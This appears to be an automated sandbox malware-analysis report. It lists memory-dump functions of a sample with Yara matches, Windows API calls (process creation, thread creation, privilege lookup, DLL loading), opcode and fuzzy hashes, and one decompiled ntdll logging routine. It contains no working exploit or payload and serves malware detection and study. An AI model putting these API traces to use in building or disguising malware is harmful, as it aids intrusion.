                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                       • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp
                                       • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 6b1f70b37f1c40e69d636f508a1b51d66662f9884e630a020f5f378566c289ff
                                      • Instruction ID: e225560b92455b70e5e10ddcb52f900035a30cd0e84fd9bf7d3c32792970f765
                                      • Opcode Fuzzy Hash: 6b1f70b37f1c40e69d636f508a1b51d66662f9884e630a020f5f378566c289ff
                                      • Instruction Fuzzy Hash: 9E90027120508C46F550B1594404A4600559BD4345F51C021A0055694D97658D55B6A1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                       • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp
                                       • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 7f65a4436a75d0eda15ea0ca5e5ea60ac0eac79eab942c0ceb567c8982e64a12
                                      • Instruction ID: 7e5b4385a0729efd6822f86bb54fafd2b41ff8d8c9ec69c9803e927b623adc0b
                                      • Opcode Fuzzy Hash: 7f65a4436a75d0eda15ea0ca5e5ea60ac0eac79eab942c0ceb567c8982e64a12
                                      • Instruction Fuzzy Hash: DB9002712010CC06F520A159840474A00459BD4341F55C421A4415658D87D588917161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                      • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp
                                      • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 82a581b71b03cac4a9cbcc5b346d6e82e0a8b99fe2501f0e568ee1c29028e94d
                                      • Instruction ID: 355baf8cb4efa10c748964ef7622eb2f8e8a6b732494d7ebc6dbf45c0b60d5ce
                                      • Instruction Fuzzy Hash: 9690027120104C46F510A1594404B4600459BE4341F51C026A0115654D8755C8517561
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                      • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp
                                      • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: e0720442bd784a8b498e843d5fff05f9e32eee26da5fac1547c51033d6abb1fc
                                      • Instruction ID: 978d3abd105bf8287130fbf93a76554d132e19837344f6732bee0c1a06d359b4
                                      • Instruction Fuzzy Hash: 67900265211044072515E559070450700869BD9391351C031F1006550CD76188617161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                      • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp
                                      • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: d915aeb22f506ae57191ed8c13acee76e656a05fac4a2dfa32d76dec59503f06
                                      • Instruction ID: 7126e903ff9f9f06bb51d2049ea7a63d98c5f8c22c0e6532388a30fa855cf2e2
                                      • Instruction Fuzzy Hash: 479002A1202044076515B1594414616404A9BE4241B51C031E1005590DC66588917165
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F172DA
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F172FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID: 3333
                                      • API String ID: 1836367815-2924271548
                                      • Opcode ID: 84e672dca496c63fd72fa7f155115ff7e27a8219a0e5ab1041d2db5ed130d1cc
                                      • Instruction ID: b698eee4d62c603bbde4a9c80d3da6318da48287092409891a4cfb563d9b5914
                                      • Instruction Fuzzy Hash: 9501DB32A402587BDB28AA949C51FBEB3599F41B60F584119FF09EB180DB94A9064BD1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • Sleep.KERNELBASE(000007D0), ref: 02F273A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: net.dll$wininet.dll
                                      • API String ID: 3472027048-1269752229
                                      • Opcode ID: e437c4b4cce030e79526a53dc8b3352d3d5139c5a698738eee0fd639da684631
                                      • Instruction ID: 026f39352b12d4b2990c8e13b3f2b9aceb81f129dbb57dd8c3b1f766cad87f4e
                                      • Instruction Fuzzy Hash: 75318FB6A01600ABC715EF64CCA0FA7B7B9AF89740F00811DFA199B241D730A549CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • Sleep.KERNELBASE(000007D0), ref: 02F273A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: net.dll$wininet.dll
                                      • API String ID: 3472027048-1269752229
                                      • Opcode ID: 2d46a481111c41ab4c42c82e81f8be4fd8097d534c4e8f694f7d5969aee6edc6
                                      • Instruction ID: 5d8264b34d97ad6bc3a13e0d978841c26c00d53b32a0613433827fa388847771
                                      • Instruction Fuzzy Hash: AC31C5B1A41611ABC711EF64CCA1FABFBB9FF49740F00812DFA199B241D770A549CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F13B93), ref: 02F2891D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      • Opcode ID: 8bd2800df3809b5b47226857547b315c7fb75db21671ffd730d1daaa34049439
                                      • Instruction ID: 3839c330a3c8fa0a8981c4b89ce157c9da788f6f5ead3a353d35024bf3c4c040
                                      • Instruction Fuzzy Hash: 02E068E82081C45BEB11EF78DCD08DB7F91AF822207188589DCD807307C121D51ACF70
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F13B93), ref: 02F2891D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                      • Instruction ID: 5ec0e86e73ae40d1fb19e3f79436ab71b35ae1747572cdd4cf9a8a8f328c900d
                                      • Instruction Fuzzy Hash: 91E046B1200218ABDB18EF99CC48EA777ADEF88790F118558FE085B241C630F914CAF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F13B93), ref: 02F2891D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      • Opcode ID: 68486664abbb3affa28714beec4584c2163a789fb142b71812b67a33f328043c
                                      • Instruction ID: ddb451bbe59dcfdf36bf1acb55a6059c655fcb7f1607100a77b991e9b304c16d
                                      • Instruction Fuzzy Hash: D8E026B41043459BDB10EF69D880897BBD5FFC1350710860AE84847702C230C82ECB70
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F172DA
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F172FB
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: f3663199beabf3b2e139a43e338370e3a84a0ac6ed7f57403b6f9c19571d6667
                                      • Instruction ID: 762bea10523743d14d4c83261debf74a934049ffc8e831442e808f9aacaa69ee
                                      • Instruction Fuzzy Hash: 9601A731A8026977E725A6949C02FBE776C5B41F91F540114FF04BA1C1EBD4690A4BF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02F19BB2
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                      • Instruction ID: 10d4d7bf0bbb76a698ab9d8fdce276b0f6384cc422bd6a4df75049893333db80
                                      • Instruction Fuzzy Hash: D9011EB5D0020DBBDF10DAA4DC41F9DB7799B54348F004195EA0897284F671EB18CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02F289B4
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction ID: 4272f7cef53e8a1835ef9bb6f6a34d37577edbaea4f174d67556fcd06a362733
                                      • Instruction Fuzzy Hash: 0201B2B2214108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02F289B4
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: 2d6cf5ca736b311a94376a6dba795589f26f8a5f09a89e66617611cee2647850
                                      • Instruction ID: b76b6854ba76b24c7ad6098b98116affece55e0b03efdc4417d88764b8f864cf
                                      • Instruction Fuzzy Hash: 3D01AFB2214108AFDB58DF89DC81EEB37ADAF8C754F158258FE1D97241D630E851CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02F1CCF0,?,?), ref: 02F2746C
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: 66f880b88237bb7f501d0255065ba32db4baa6cc8d92a9a3ead106e4e83ff01e
                                      • Instruction ID: 3723ad7f98d43ecee74993ed5526a85c98377c9bbff1e25605d113e24c4008b1
                                      • Instruction Fuzzy Hash: 08E06D737802243AE22065A99C02FA7B29C8B82B64F540026FB4DEA2C0D595F80546A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,02F1CFC2,02F1CFC2,?,00000000,?,?), ref: 02F28A80
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 4e7d721f8328b8f51a01c1d00dbe43bd949a04adb7d464723908b40d29176f68
                                      • Instruction ID: 2d49eef7d67b989b1bb8abb3d4aa4c1c768ddc82e81ffc8153cc36f587d7f81a
                                      • Instruction Fuzzy Hash: 2FF0ECB6210214ABDB24EF88DC45EE737B9EF853A0F008065FA0C5B202D531E816CBB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02F1CCF0,?,?), ref: 02F2746C
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: ec6bfc528b8c059351f13563a2afb26f769df41b280fdb9eba7754a605d37bce
                                      • Instruction ID: 61f51fa125f9aeb0c8532a70e0aab8e2aeedfcd6ef548c3c1549ab60ee0eae6e
                                      • Instruction Fuzzy Hash: CFF022327907103AE23035688C03F97B25CCB82FA4F640028FF19AB2C0D994F80843A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlAllocateHeap.NTDLL(02F23536,?,02F23CAF,02F23CAF,?,02F23536,?,?,?,?,?,00000000,00000000,?), ref: 02F288DD
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 4a5f5bb0c79bc480d33d084326274a1fadb27943092301cfc1423ead36c83616
                                      • Instruction ID: 47915c4782cb99ad96d039abf059211316c2402395e78c58071e6638e004de7b
                                      • Instruction Fuzzy Hash: E4E06DB2640224AFDB14EF64DC48EA77768AF86394F114158FA086B191C231F919CBB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,02F1CFC2,02F1CFC2,?,00000000,?,?), ref: 02F28A80
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction ID: d1d2dfa52dd5461a40df9b98f705adda90a5cb2e89c84a9738ef6b13686cb5cf
                                      • Instruction Fuzzy Hash: D8E01AB12002186BDB10DF49CC84EE737ADAF89650F118154FE0857241C930E914CBF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlAllocateHeap.NTDLL(02F23536,?,02F23CAF,02F23CAF,?,02F23536,?,?,?,?,?,00000000,00000000,?), ref: 02F288DD
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                      • Instruction ID: 59b9e670a9d4c6c31411ee701fcded9a826a00a45f66b27a4203a9d60f4c617e
                                      • Instruction Fuzzy Hash: F8E046B1200218ABDB14EF99CC44EA777ADEF88790F118558FE085B241C630F914CBF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003,?,?,02F17C83,?), ref: 02F1D45B
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: fb9a62114719d4365fa9ed6b2ac8ff86b6e63830a065c6325675c0013ad5295d
                                      • Instruction ID: 7b787a93899b452afb2a3d51c323ab00c230bf3dec57eeeb0aedd2e5576f7da4
                                      • Instruction Fuzzy Hash: 19E0C272A502042AEB14EFA49C13F9773A5AF25BC0F8A40A4FA88DB387EA65D5058611
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003,?,?,02F17C83,?), ref: 02F1D45B
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                      • Instruction ID: 9cd4186fad4e26249f16c9e837e1e0a1369157417f975968d5c9cee9279d808e
                                      • Instruction Fuzzy Hash: 9AD0A7717503083BE710FAA89C13F2633CD5B45B84F494064FB48D73C3DA54F4058561
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                      • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp
                                      • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 0fd06d084880cc76b42f7508f84834baadd3dc58262f127501e257c14ec3c0c3
                                      • Instruction ID: 21366c38769c8bbe3a5472d1b332b0c02609fdc0b829177763d0711acb8457d8
                                      • Instruction Fuzzy Hash: 0AB09B719015C5C9FA11D760470871779447BD5741F16C061D2020641A4778C091F5B5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      C-Code - Quality: 53%
                                      			E037BFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                      				void* _t7;
                                      				intOrPtr _t9;
                                      				intOrPtr _t10;
                                      				intOrPtr* _t12;
                                      				intOrPtr* _t13;
                                      				intOrPtr _t14;
                                      				intOrPtr* _t15;
                                      
                                      				_t13 = __edx;
                                      				_push(_a4);
                                      				_t14 =  *[fs:0x18];
                                      				_t15 = _t12;
                                      				_t7 = E0376CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                      				_push(_t13);
                                      				E037B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                      				_t9 =  *_t15;
                                      				if(_t9 == 0xffffffff) {
                                      					_t10 = 0;
                                      				} else {
                                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                      				}
                                      				_push(_t10);
                                      				_push(_t15);
                                      				_push( *((intOrPtr*)(_t15 + 0xc)));
                                      				_push( *((intOrPtr*)(_t14 + 0x24)));
                                      				return E037B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                      			}

                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 037BFDFA
                                      Strings
                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 037BFE2B
                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 037BFE01
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
• Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp
• Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                      • API String ID: 885266447-3903918235
                                      • Opcode ID: 8fc867ae0da030e2f21de6e5bed8e52925184cc87b485f72ef503ffebd5264cf
                                      • Instruction ID: 776ef4d646dbef420b065e56c6a1c6a292dd5e81dc9b8908947d31dbe9a24356
                                      • Opcode Fuzzy Hash: 8fc867ae0da030e2f21de6e5bed8e52925184cc87b485f72ef503ffebd5264cf
                                      • Instruction Fuzzy Hash: BEF0C8762006017FD7215E45DC05F67BB7ADB45730F140214F624591D1D962B83096A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%
